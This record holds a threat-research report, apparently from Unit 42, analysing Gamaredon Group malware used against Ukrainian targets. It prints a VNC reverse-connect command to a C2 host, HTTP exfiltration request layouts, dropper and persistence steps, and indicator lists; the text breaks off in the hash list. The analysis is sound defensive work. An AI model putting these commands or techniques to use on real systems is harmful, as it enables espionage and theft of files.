{
	"id": "615654d9-a14a-48a8-b65f-05d73a2e63f8",
	"created_at": "2026-04-06T00:21:50.344371Z",
	"updated_at": "2026-04-10T13:11:35.561944Z",
	"deleted_at": null,
	"sha1_hash": "d870eee1c89b358082b38b2dcc4850e137ca1d83",
	"title": "The Gamaredon Group Toolset Evolution",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1020148,
	"plain_text": "The Gamaredon Group Toolset Evolution\r\nBy Anthony Kasza, Dominik Reichel\r\nPublished: 2017-02-27 · Archived: 2026-04-02 12:40:44 UTC\r\nUnit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have\r\nlabelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at\r\nleast 2013.\r\nIn the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group\r\nhave made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group have improved their\r\ntechnical capabilities. The custom-developed malware is fully featured and includes these capabilities:\r\nA mechanism for downloading and executing additional payloads of their choice\r\nThe ability to scan system drives for specific file types\r\nThe ability to capture screenshots\r\nThe ability to remotely execute commands on the system in the user’s security context\r\nThe Gamaredon Group primarily makes use of compromised domains, dynamic DNS providers, Russian and Ukrainian\r\ncountry code top-level domains (ccTLDs), and Russian hosting providers to distribute their custom-built malware.\r\nAntimalware technologies have a poor record of detecting the malware this group has developed. We believe this is likely\r\ndue to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications\r\nand tools (such as wget) for malicious purposes.\r\nPreviously, LookingGlass reported on a campaign they named \"Operation Armageddon,\" targeting individuals involved in\r\nthe Ukrainian military and national security establishment. Because we believe this group is behind that campaign, we’ve\r\nnamed them the Gamaredon Group, an anagram of “Armageddon”. 
At this time, it is unknown if the new payloads this\r\ngroup is distributing are a continuation of Operation Armageddon or a new campaign.\r\nGamaredon: Historical Tool Analysis\r\nThe earliest discovered sample (based on compile times and sandbox submission times) distributed by this threat group\r\nresembles the descriptions of Gamaredon provided by Symantec and Trend Micro. Unfortunately, this identification is rather\r\ntenuous, as it seems to only identify the first variant of payloads used by our threat actors. Some samples of later payload\r\nvariants also have been given the generic and brittle names of TROJ_RESETTER.BB and TROJ_FRAUDROP.EX.\r\nOriginally, the payloads delivered to targets by this threat group consisted of a password protected self-extracting Zip archive (.SFX) file which, when extracted, wrote a batch script to disk and installed a legitimate remote administration tool\r\ncalled Remote Manipulator System (Figure 1) which they would abuse for malicious purposes.\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 1 of 17\n\nFigure 1 Remote Manipulator System Interface\r\nOne such self-extracting archive (ca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc) was first\r\nobserved around April of 2014. The password (reused by many of the password protected SFX payloads) it used to extract\r\nitself is “1234567890__”. The files included in this SFX file we observed include a batch file named “123.cmd” and another\r\nSFX named “setting.exe”. This second SFX contains a .MSI installer package which installs Remote Manipulator System\r\nand a batch script which handles the installation.\r\nLater payloads would write batch scripts to disk as well as wget binaries. The batch scripts would use the wget binaries to\r\ndownload and execute additional executables. 
The scripts would also use wget to send POST requests to command and\r\ncontrol (C2) servers that would contain information about the compromised system. Some of these payloads included decoy\r\ndocuments that would open when the malware is executed.\r\nThree examples of this type of payload include:\r\na6a44ee854c846f31d15b0ca2d6001fb0bdddc85f17e2e56abb2fa9373e8cfe7\r\nb5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13\r\n3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b\r\nWe first observed these samples using wget in 2014. The filenames and decoy documents these samples used attempt to lure\r\nindividuals by using the presidential administration of Ukraine, Ukrainian national security and defense, the Anti-Terrorist\r\nOperation Zone in Ukraine, and Ukrainian patriotism as subjects. The text of one such decoy document is pictured\r\nbelow.\r\nFigure 2 Ukrainian Decoy Document used by Gamaredon Group\r\nOther observed payloads would, again, use SFX files to deliver a batch script and an executable that allowed remote access\r\nthrough the VNC protocol. These VNC executables would either be included in the SFX file or downloaded by the batch\r\nscript. We found one URL (now taken down) that hosted a VNC executable that the malware would attempt to download\r\nand install at hxxp://prestigeclub.frantov.com[.]ua/press-center/press/chrome-xvnc-v5517.exe.\r\nThe batch script would then attempt to have the VNC program connect to a command and control (C2) server to enable the\r\nserver to control the compromised system. All VNC installations on compromised systems that we observed have used the\r\nsame configuration file, RC4 key file, and passwords.\r\nOne such sample, cfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31, first appeared around January\r\nof 2015. 
The batch script utilized in this sample ensures a VNC connection is available:\r\nstart winlogons -autoreconnect -id:%sP% -connect grom56.ddns.net:5500\r\nThe path configured in the VNC configuration file across all implants employing VNC (UltraVNC.ini) is\r\n“Y:\\ПРОБА\\Создание троянов\\создание RMS\\vnc”. This isn’t the only place hardcoded Cyrillic file paths are used by\r\nimplants. Many of the batch scripts also use hardcoded paths such as “Главное меню\\Программы\\Автозагрузка”. Many\r\npayloads also include a VBS script which raises a dialog box to the user asking them to run the malware again. It reads,\r\n“Ошибка при инициализации приложения (0xc0000005). Повторить попытку открытия файла?” (English Translation\r\nfrom Russian: Application failed to initialize (0xc0000005). Try to open the file again?).\r\nSome of the SFX files also include another legitimate application called ChkFlsh.exe\r\n(8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845). This application was written by a Ukrainian\r\nprogrammer and is used to check the performance of USB flash drives. Its value to the attackers isn’t clear, but\r\none possibility is that it is somehow used to steal or monitor files on USB devices. In our research, we found this application\r\npresent in some SFX files along with VNC programs and in some SFX files that didn’t have VNC programs included.\r\nCustom Implants\r\nWhile the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from\r\napplications like wget, Remote Manipulator Tool, VNC and ChkFlsh.exe. 
Instead of using wget the attackers are distributing\r\ncustom developed downloaders, and instead of Remote Manipulator or VNC the malware is using a custom developed\r\nremote access implant.\r\nIn June of 2015 a custom downloader used by many newer samples was first seen in the wild and is often included in SFX\r\nimplants with the name “LocalSMS.dll”. This downloader makes requests to adobe.update-service[.]net (hardcoded in the\r\nsample) and is further discussed in Appendix A.\r\nIn February 2016, another custom tool now often included in SFX implants was seen in the wild. This SFX file\r\n(3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9) contains a new Trojan\r\n(598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824) we refer to as “Pteranodon.” Pteranodon is a\r\ncustom backdoor which is capable of the following tasks:\r\nCapturing screenshots at a configurable interval and uploading them to the attacker\r\nDownloading and executing additional files\r\nExecuting arbitrary commands on the system\r\nThe earliest version of Pteranodon uses a hardcoded URL for command and control. It sends POST requests to\r\n“msrestore[.]ru/post.php” using a static multipart boundary:\r\n------------870978B0uNd4Ry_$\r\nNewer versions of the tool also use hardcoded domains and multipart boundaries. They also share similar pdb strings. Other\r\nPteranodon samples can be found in AutoFocus using the Pteranodon tag. The most recent variant of Pteranodon is analyzed\r\nin Appendix A.\r\nWe have only identified one delivery vector for the new implants thus far. 
A Javascript file\r\n(f2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd) first seen in December of 2016 downloads a\r\nresource from http://samotsvety.com[.]ua/files/index.pht (likely a compromised site used for staging payloads) which\r\npreviously was an SFX file (b2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875) containing two of the\r\nGamaredon custom tools.\r\nA related sample (e24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4) used the same distinct\r\nmutex and contains a larger set of tools for analysis. The original name of the file is \"AdapterTroubleshooter.exe\" and the\r\nfile uses icons which resemble those used by OpenVPN, as seen below.\r\nUpon examining the sample's file activity within AutoFocus it is clear the sample is a self-extracting executable.\r\nFigure 3 Self Extracting executable behavior shown in AutoFocus\r\nOpening the sample with 7zip inside of a virtual machine, all the file contents can be examined. Below is a table providing\r\nthe SHA256 values, the filenames, the compile timestamps and the pdb paths of the contents of the SFX file.\r\nSHA256 | Filename | Compile Time | PDB Path\r\n400f53a89d08d47f608e1288d9873bf8d421fc7cd642c5e821674f38e07a1501 | LocalSMS.dll | Wed Apr 29 08:10:30 2015 | c:\\users\\viber\\documents\\vi 2013\\projects\\contextmenu\\\r\nd01df47b6187631c9a93bdad1298439ab1a1c5529b3319f3614b6ec2455e5726 | MpClients.dll | Thu Sep 08 05:01:00 2016 | c:\\users\\user\\documents\\vis 2015\\projects\\updaterv1\\rel\r\nf2296bcb6be68dfb330baec2091fb11a42a51928ba057164213580e6ff0e1126 | OfficeUpdate.dll | Wed Dec 07 09:25:57 2016 | -\r\n2ded2f3b5b5b6155ce818893c67887cbfa8b539be6c983e314ccf2177552da20 | SmartArtGraphicsLog.lnk | - | -\r\n46a39da996b01e26ddd71d51c9704de2aa641cd3443f6fe0e5c485f1cd9fa65d | UsrClass.lnk | - | -\r\na972ad0ddc00d5c04d9fe26f1748e12008efdd6524c9d2ea4e6c2d3e42d82b7b | condirs.cmd | - | -\r\n37c78ee7826d63bb9219de594ed6693f18da5db60e3cbc86795bd10b296f12ac | winrestore.dll | Mon Jan 09 03:12:39 2017 | c:\\develop\\ready\\winrestore proxy\\release\\winrestore.pd\r\n90ba0f95896736b799f8651ef0600d4fa85c6c3e056e54eab5bb216327912edd | wmphost.exe | Thu Dec 01 08:23:32 2016 | c:\\develop\\ready\\mouse-mo move\\release\\mouse-move.p\r\nThe bootstrapping logic for the sample relies on the contents of \"condirs.cmd\". Briefly, the logic within \"condirs.cmd\"\r\nfollows:\r\n1. Ensure \"%LOCALAPPDATA%\\Microsoft\\Windows\\\" exists\r\n2. Kill and delete processes, files, and scheduled tasks which may interfere with the sample executing\r\n3. Copy \"winrestore.dll\" to \"%LOCALAPPDATA%\\Microsoft\\Windows\\UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll\"\r\n4. Copy \"OfficeUpdate.dll\" to \"%LOCALAPPDATA%\\Microsoft\\Windows\\UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll\"\r\n5. Determine if the operating system is Windows XP or Windows 7\r\n6. If the system is running Windows XP\r\na. Set the directory to copy files into as \"%WINDIR%\\Setup\\State\\Office\"\r\nb. Copy \"UsrClass.lnk\" to \"%USERPROFILE%\\Главное меню\\Программы\\Автозагрузка\\\"\r\nc. Copy \"SmartArtGraphicsLog.lnk\" to \"%USERPROFILE%\\Главное меню\\Программы\\Автозагрузка\\\"\r\n7. If the system is running Windows 7\r\na. Set the directory to copy files into as \"%APPDATA%\\Microsoft\\Office\"\r\nb. Copy \"UsrClass.lnk\" to \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\r\nc. Copy \"SmartArtGraphicsLog.lnk\" to \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\r\nFigure 4 Windows XP and Windows 7 logic within \"condirs.cmd\"\r\n8. Copy \"winrestore.dll\" to the directory set in step 6a or 7a with the filename \"MSO1234.win\"\r\n9. 
Copy \"LocalSMS.dll\" to the directory set in step 6a or 7a with the filename \"MSO1567.dls\"\r\n10. Copy \"OfficeUpdate.dll\" to the directory set in step 6a or 7a with the filename \"MSO5678.usb\"\r\n11. Copy \"MpClients.dll\" to the directory set in step 6a or 7a with the filename \"MSO8734.obn\"\r\n12. Execute the exported function \"updater\" within \"MSO1234.win\" using rundll32.exe\r\n13. Execute the exported function \"EntryPoint\" within \"MSO1567.dls\" using rundll32.exe\r\nIt should be noted that \"UsrClass.lnk\" links to \"%WINDIR%\\system32\\rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll,updater\" and \"SmartArtGraphicsLog.lnk\" links to \"C:\\WINDOWS\\system32\\rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll,StartBackup\". These are the locations \"winrestore.dll\" and\r\n\"OfficeUpdate.dll\" were copied to in steps 3 and 4, respectively.\r\nThe \"condirs.cmd\" script then continues to:\r\n1. Schedule the following tasks:\r\na. Task name \"UpdatesWinRes\", invoke \"MSO1234.win,updater\"\r\nb. Task name \"UpdatesWinDLL\", invoke \"MSO1567.dls,EntryPoint\"\r\nc. Task name \"UpdatesWinUSBOOK\", invoke \"MSO5678.usb,StartBackup\"\r\nd. Task name \"UpdatesWinOBN\", invoke \"MSO8734.obn,bitDefender\"\r\n2. Ensure the directory \"%Temp%\\reports\\ProfileSkype\\\" exists\r\n3. Kill processes named \"skype.exe\"\r\n4. Copy the contents of \"%AppData%\\Skype\" to \"%Temp%\\reports\\ProfileSkype\\\"\r\n5. Create subdirectories under \"%Temp%\\reports\\%COMPUTERNAME\\\" with names: Z W P S V Q N M L K I J F H E G\r\nand D. These are drive letters.\r\n6. Copy all files from all above drive letters with extensions \"doc\", \"docx\", \"xls\", \"xlsx\", \"rtf\", \"odt\" and \"txt\" into\r\n\"%TEMP%\\reports\\%COMPUTERNAME%\\%%d\\\" where %%d is the drive letter\r\n7. 
Copy all files with the above extensions from all users' \"Desktop\", \"Documents\", and \"Downloads\" folders to\r\n\"%TEMP%\\reports\\%COMPUTERNAME%\\Desktop\\\", \"%TEMP%\\reports\\%COMPUTERNAME%\\Documents\\\" and\r\n\"%TEMP%\\reports\\%COMPUTERNAME%\\Downloads\\\" respectively\r\nFigure 5 The document stealing logic inside \"condirs.cmd\"\r\n8. Execute the exported function \"StartBackup\" within \"MSO5678.usb\" using rundll32.exe\r\n9. Execute the exported function \"bitDefender\" within \"MSO8734.obn\" using rundll32.exe\r\n10. Clean up temporary files, sleep, and delete itself\r\nWhen this script has completed, a series of implants giving the attacker the ability to steal files, capture screenshots and\r\nevade detection are deployed on the system. These individual implants are analyzed in detail in Appendix A.\r\nTrends Across Implants\r\nWhile the payloads used to control compromised systems have evolved over time, many commonalities appear across the\r\nsamples. While not every sample distributed by this group is described in this blog, hashes of the known samples are\r\nincluded in the Indicators of Compromise section. Some interesting behaviors from a few of the related samples include:\r\nMany of the batch scripts include misspellings of common English words. One such example is the filename \"cmd\";\r\nanother, \"domen\", is used as a variable name in a batch script and is likely meant to be \"domain\"\r\nAlmost all batch scripts in all samples ping localhost as a means of sleeping\r\nMany of the batch scripts are named \"cmd\" and some include the strings \"Trons_ups\" and \"Treams\"\r\nMany of the batch scripts use the same commands for determining operating system version.\r\nMany of the early samples used applications such as wget, UltraVNC, and ChkFlash. 
These utilities have been\r\nreplaced with custom tools in the latest sample\r\nSamples employing VNC used the same configuration and passwords\r\nAdditionally, the infrastructure used by this group has not changed much in the past three years. Many of the samples reused\r\nthe same domains for implant communication. Also, many of the custom developed tools use hardcoded network locations.\r\nMonikers used for filenames, exported DLL functions, domains, and variable names in scripts seem to be themed and\r\nconsistent. By pivoting on indicators from one of the SFX implants within AutoFocus, additional samples are easily\r\nidentified by overlaps in these consistencies. Most samples were delivered in a similar fashion: an SFX dropping resources\r\nwhich are staged and loaded with a batch and/or VBS script. The reuse of SSL certificates between IPv4 addresses as well as\r\nthe reuse of IPv4 addresses between domain names is apparent when viewing a large collection of entities involved in this\r\ncampaign, as shown below.\r\nFocusing on one of the newest samples (analyzed in Appendix A), the reuse of file names as well as SFX content files\r\nbecomes apparent.\r\nFigure 6 Overview of the relationships between Samples and Network Infrastructure used by the Gamaredon Group\r\nFinal Word\r\nThe implants identified have limited, generic, and often conflicting detections on VirusTotal. The threat group using these\r\nimplants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian\r\ngovernment. Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few\r\nantivirus vendors as Gamaredon. 
However, newer variants deliver more advanced malware which goes unnamed.\r\nPeriodically, researchers at Palo Alto Networks hunt through WildFire execution reports, using AutoFocus, to identify\r\nuntagged samples' artifacts in the hopes of identifying previously undiscovered malware families, behaviors, and campaigns.\r\nThis blog presents a threat group identified by the above process using AutoFocus. By actively hunting for malicious\r\nactivity and files instead of waiting for alerts to triage, defenders can identify and build protections for new trends before\r\nthey arrive on their corporate networks and endpoints. More details about this threat group can be found in the AutoFocus\r\ntag GamaredonGroup.\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nWildFire identifies the malware described in this report as malicious.\r\nTraps prevents execution of the malware described in this report.\r\nThe C2 domains used by this group are blocked through Threat Prevention.\r\nSpecial thanks go out to Tom Lancaster for both his assistance in this investigation and for his charming good looks.\r\nAppendix A: Custom Implant Analyses\r\nUSBStealer: MSO5678.usb / OfficeUpdate.dll\r\nThis file is a USB file stealer, as can also be guessed from its internal name \"USBgrabber.dll\". However, the\r\nimplementation is sloppy, which makes it a file stealer for any newly connected logical volume on a system. This is because\r\nthe malware monitors the computer for the messages WM_COMMAND and WM_DEVICECHANGE but does not verify whether a\r\nUSB drive was connected.\r\nThe malware creates two mutexes \"__Wsnusb73__\" and \"__Wsnusbtt73__\". Then, it creates the following folder in the\r\ntemp path of the local user:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\reports\"\r\nThis folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the\r\nC2 server. 
The files are transferred to the hardcoded C2 server \"195.62.52.93\" one by one via the HTTP POST method. The\r\nfollowing request is used, which also includes information about the victim, the file to be transferred as well as the source\r\ndrive:\r\nPOST /post.php HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----qwerty\r\nHost: 195.62.52.93\r\nContent-Length: ...\r\nCache-Control: no-cache\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filename\"\r\n\\\\\u003cfilename\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filedate\"\r\n\u003cmonth\u003e/\u003cday\u003e/\u003cyear\u003e \u003chour\u003e:\u003cseconds\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"compname\"\r\n\u003cComputerName\u003e||\u003cUsername\u003e||\u003cUserHWGUID\u003e||\u003cC_VolumeSerialNumber\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"serial\"\r\n\u003cSerialNumberOfDriveToStealFrom\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"w\"\r\n\"?\"\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filesize\"\r\n\u003cFileSize\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\u003cAbsoluteFilePathInTemporaryLocation\u003e\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n...File data...\r\n------qwerty--\r\nThe malware also creates a SQLite database named \"asha.dat\" in the local user's temp folder. Therein, it keeps track of files\r\nwhich were stolen by calculating the MD5 hash of the filename followed by the file length. 
To do so, it creates a Unicode\r\nstring of the original file path from the drive and concatenates the file size in bytes to it. Finally, it uses the API functions\r\nMD5Init(), MD5Update() and MD5Final() to calculate the hash and store it in the database.\r\nFigure 7 Structure of the database created by the malware\r\nIt should be noted that hashes are only added to the database for files that don't have the following extensions:\r\nDLL\r\nBIN\r\nCAB\r\nEXE\r\nISO\r\nDownloader: MSO1567.dls / LocalSMS.dll\r\nThis file is essentially a simple downloader which contacts the C2 server to send some user data and get an executable as\r\nresponse which will be executed. The DLL is written in C++ and all of the functionality is in an export function\r\nnamed \"EntryPoint\". The file was compiled without any compiler or linker optimizations, hence the large file size and the\r\nremaining PDB path string.\r\nAt first, the malware retrieves the temp path of the local user (\"C:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\\"), the\r\ncomputer name (e.g. \"WIN-MLABCSUOVJB\"), the hardware profile GUID (e.g. \"{826ee360-7139-11de-8d20-808e6f6e6263}\") and the volume serial number of C:\\ drive (e.g. \"1956047236\"). Next, it takes the following hardcoded\r\nstring:\r\nhttp://adobe.update-service[.]net/index.php?comp=\r\nto create a URL string with the victim's information for contacting the C2 server:\r\nhttp://adobe.update-service[.]net/index.php?comp=WIN-MLABCSUOVJB\u0026id=WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236\r\nTo create the filename where the downloaded file will be saved, the malware tries to build a random string of 10 characters.\r\nHowever, due to an implementation error the string always ends up being the same, namely \"frAQBc8Wsa\". 
This string gets\r\nconcatenated with the retrieved local user's temp path to form the following file path:\r\nC:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\frAQBc8Wsa\r\nThen, it uses the API function URLDownloadToFileA() to download a payload to disk and executes it via CreateProcess().\r\nFinally, it sleeps for 60 seconds before terminating the payload, and the DLL exits.\r\nDownloader: MSO8734.obn / MpClients.dll\r\nThis file is a slightly more advanced version of the LocalSMS.dll downloader. Instead of downloading a payload directly to\r\ndisk, this file requests a download command from the C2 server which contains the actual payload URL to be used.\r\nFor this, it uses a basic network implementation based on the Winsock functions. All the functionality of this DLL is put\r\ninto an export function named \"bitDefender\".\r\nIt creates a socket, requests the address of the hardcoded C2 server \"win-restore.ru\" via gethostbyname() and connects to it.\r\nThereafter, it also collects the volume serial number of C:\\ drive, the computer name and the hardware profile GUID. With\r\nthis information, it creates the following string used by a subsequent send() function call:\r\n\"GET /css.php?id=WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236 HTTP/1.1\r\nHost: win-restore.ru\r\nConnection: close\"\r\nThe response will be stored in a memory buffer via recv() and scanned for the string \"urltoload={\". As the name suggests,\r\nthe received data contains the actual URL of the payload inside curly brackets. The URL gets pulled out of the string and is\r\nused again as input for the API function URLDownloadToFile(). 
Again, the same file path will be used to store the payload\r\non disk and execute it:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\frAQBc8Wsa\"\r\nPteranodon: MSO1234.win / winrestore.dll\r\nPteranodon is a backdoor which also can capture screenshots based on a configuration file created on the disk. Further, it\r\nuploads the screenshots to the C2 server unencrypted. All the functionality of this DLL is put into an export function named\r\n\"updater\".\r\nAt first, it retrieves the %APPDATA% folder of the local user to build the following file path:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Roaming\\Microsoft\\desktop.ini\"\r\nThen, it checks if the file already exists and continues execution if so. If not, it runs a routine which checks if there is mouse\r\nmovement as an anti-sandbox technique. If no mouse movement is detected the malware runs in an infinite loop checking\r\nfor mouse movement.\r\nIf the file \"desktop.ini\" does not exist, the malware creates it and writes the following information into it:\r\n\" interval={60} msfolder={10} status={0}\"\r\nThis information is used as configuration data to create the screenshots. There are also other commands possible which can\r\nbe retrieved from the C2 server. The following commands are available:\r\nexec={\r\nThis command is used to download and execute a payload from a URL present in the curly brackets. It creates a random file\r\npath in temp folder, calls URLDownloadToFile() and CreateProcess() to run the payload. 
Then, it waits 30s and terminates\r\nthe payload.\r\ninterval={\r\nThis command is used to define the interval in seconds between the creation of two or more screenshots.\r\nmsfolder={\r\nThis command defines the number of screenshots to create.\r\ncommand={ / command_c={\r\nThis command is used to execute a file present as a string between the curly brackets. The variant with the \"c\" uses the\r\nWindows tool cmd.exe with help of ShellExecute().\r\nstatus={\r\nThis command contains the flag which defines if screenshots should be made (\"1\") or not (\"0\").\r\nNext, it checks for a mutex named \"asassin1dj\" to verify if the system is already infected and creates it if this isn't the case:\r\nFigure 8 Mutex check and creation routine\r\nNext, it creates the following folder, if not already present:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Roaming\\Microsoft\\store\"\r\nNext, according to the configuration data in \"desktop.ini\" it constantly creates 24-bit color depth JPEG screenshots without\r\nextension in the store folder with help of GDI32 and gdiplus API functions. The following file naming scheme for the\r\nscreenshots is used:\r\n\u003cyear\u003e\u003cmonth\u003e\u003cday\u003e_\u003chour\u003e\u003cminute\u003e\u003cseconds\u003e\r\nAfter the last screenshot was created, it uploads all files from the \"store\" folder to the C2 server \"win-restore[.]ru\". Then, it\r\ndeletes all the files present in the folder and starts a new screenshot creation cycle. It should be noted that there is no check\r\nof what files are uploaded. The files are uploaded via POST HTTP method to the script \"vvd.php\". 
For this, the following\r\nHTTP request is used, which contains data from the victim as well as the JPEG files:\r\nPOST /vvd.php HTTP/1.1\r\nAccept: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\nContent-Type: multipart/form-data; boundary=----------987978B0urd3Gf_$\r\nAccept-Charset: utf-8\r\nUser-Agent: asasing\r\nHost: win-restore.ru\r\nContent-Length: \u003clength\u003e\r\nCache-Control: no-cache\r\n------------987978B0urd3Gf_$\r\nContent-Type: text/html\r\nContent-Disposition: form-data; name=\"uuid\"\r\nWIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236\r\n------------987978B0urd3Gf_$\r\nContent-Type: application/octet-stream\r\nContent-Disposition: form-data; name=\"file0\"; filename=\"\u003cyear\u003e\u003cmonth\u003e\u003cday\u003e_\u003chour\u003e\u003cminute\u003e\u003cseconds\u003e\"\r\nContent-Transfer-Encoding: 8bit\r\n...JPEG file...\r\n------------987978B0urd3Gf_$\r\nContent-Type: application/octet-stream\r\nContent-Disposition: form-data; name=\"file1\"; filename=\"\u003cyear\u003e\u003cmonth\u003e\u003cday\u003e_\u003chour\u003e\u003cminute\u003e\u003cseconds\u003e\"\r\nContent-Transfer-Encoding: 8bit\r\n...JPEG file...\r\n...\r\n------------987978B0urd3Gf_$\r\nFinally, it checks if any new command information is available from the C2 server and updates the \"desktop.ini\" file\r\naccording to it. Based on functionality, compile timestamps, and binary differencing, this malware is likely an updated\r\nversion of 598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824.\r\nwmphost.exe\r\nThis file runs an infinite loop until mouse movement gets detected, then it exits. 
This file can be used to circumvent\r\nsandboxes that don't simulate mouse movement. To detect if it's running inside a sandbox, another file can scan the list of\r\nrunning processes to see if \"wmphost.exe\" is present or not.\r\nAppendix B: Indicators of Compromise\r\nDomain Names\r\nURLs:\r\nhttp://childrights.in[.]ua/public/manager/img/scrdll.ini\r\nhttp://prestigeclub.frantov[.]com.ua/press-center/press/chrome-xvnc-v5517.exe\r\nhttp://umachka[.]ua/screen/dk.tmp\r\nhttp://umachka[.]ua/screen/screen.tmp\r\nhttp://viberload.ddns[.]net/viber.nls\r\nHashes:\r\nSamples using custom developed tools:\r\n
aa560c3dde4a5b3486bf2a\r\nbe2be662cc821a924d5641422dd1116e99188c6923da092ca3f0f8f862bd2d2d\r\nd01df47b6187631c9a93bdad1298439ab1a1c5529b3319f3614b6ec2455e5726\r\nd1ba365e93ff0a4f3a2cb1d657568e583e3fbd7dbb1c2c52e28f16480324e3bb\r\nddfc6bb4819527b2424d6e1a84f04b67adad79401e39efbffba5b7d727e732f0\r\ndf434f54802a6814628f30cae335c302bae7085c4e8314d71a41a47d9c410c39\r\ne24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4\r\nf2296bcb6be68dfb330baec2091fb11a42a51928ba057164213580e6ff0e1126 \r\nSamples using bundled commodity tools:\r\n026be8a873560f1496c6961f6e36c312bdda01beacb17c4b744f35ee1923d061\r\n03c943f5cba11b09b9c3afa0705d4a027e5a9d81b299711740cc5aedfe4b4aa1\r\n03e5e99cc8280de4663c4b65bfd26782d4975258808a63a4b20bc068008df7f5\r\n059e40ba91b2b2d827c200476fcbd0fad0d43ab198d0c206c996777d27e6de65\r\n0669e61e51cf43daa431d52b5461c90bdce1b1bee03b087e4406c30264dcb9a4\r\n068b9a9194efacc16cf142814e79b7041b6ab3d671a95bb508dbd30061c324aa\r\n0b4a90b823a581311c4acb59f35e32f81f70ca16a2538f54f4dbe03db93350df\r\n0b5316d723d1ebbec9aba0c9ff6761050305d644c3eeb5291b4e2c4de9e5fa15\r\n0b8d59312699739b6e6cb7aeb0f22a2eaebbb0fd898a97ef9b83e8d8e9ce67a0\r\n0dd13d2d0edbcf9d1825c2bfc165876ada2e4d04e2981a0003cb6503fad2287b\r\n0ddb7867e31f3f30cd1cfe74393f8ac5bbdc61538278de9219a49345f0d3af7f\r\n13fed3accac4f38f28e606b110a3b7924d9c7a1a911f8c0613d0bb791e715267\r\n151cf4c83722ba171ae42640e5e13af67ca06ee0a06a74afa53931acf6ac1506\r\n17006d77cc1459aa3d70e4e9377edb2547a7446647aa9872c9dd9ad860ed7e39\r\n1ec7e595677038145991c6d84dc7808602142f258c1f90e9486cca0fe531d74f\r\n208dc592111a8221a9c633efc120b890585f9a67ed340cbb5ec9db4cd5e164e4\r\n2124adbee89f2c1cb65896bed26e7ffa8bf0fcbdfeb99a9e751fea9cca7a896b\r\n22e97292671ada8deef4329eb115c52f6f1bc598bcf01a3961f1c35a2230a013\r\n259a78122ef51ae503059143bf36941fc6090be83213d196ba3051ba36a0b2a1\r\n26564c23530dd14e0042e074f4178a5b2ad6fc8f51f10138fc39941a6303bff9\r\n29453fa1772b6d7d33842d6abbe0cb55c4a4b66a00f43284c8724d7c16749a7d\r\n2a072d9ce63a94d2530cf9f18a2
